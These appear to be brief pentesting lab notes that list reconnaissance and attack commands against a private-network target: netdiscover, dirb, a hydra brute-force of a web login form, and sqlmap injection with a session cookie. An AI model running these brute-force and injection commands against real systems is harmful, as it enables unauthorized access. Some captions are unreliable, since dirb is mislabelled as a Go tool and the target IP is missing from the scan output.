Pentesting is an authorized simulated attack on a computer system, performed to evaluate the security of the system.
root@kali:~# netdiscover -i eth2 -r 192.168.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.1 f8:1a:67:5a:fe:24 1 60 TP-LINK TECHNOLOGIES CO.,LTD
192.168.0.100 a8:60:b6:3a:56:ce 2 120 Apple, Inc.
192.168.0.101 e0:3f:49:14:a9:0d 1 60 Unknown vendor
dirb http://192.168.0.104/ /usr/share/wordlists/dirb/big.txt
Directory/file & DNS busting tool written in Go.
Exploiting Username and Password forms.
hydra 192.168.0.104 http-post-form '/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid password' -L /root/usernames.txt -P /usr/share/wordlists/metasploit/password.lst -vV -t 10 -w 30 -o hydra-http-post-attack.txt
Used for doing SQL injection stuff.
sqlmap -u http://192.168.0.104/imfadministrator/cms.php?pagename=upload --banner --cookie="PHPSESSID=m0i2uapvsqlklug2tpe2a8cis2; security=low" -f
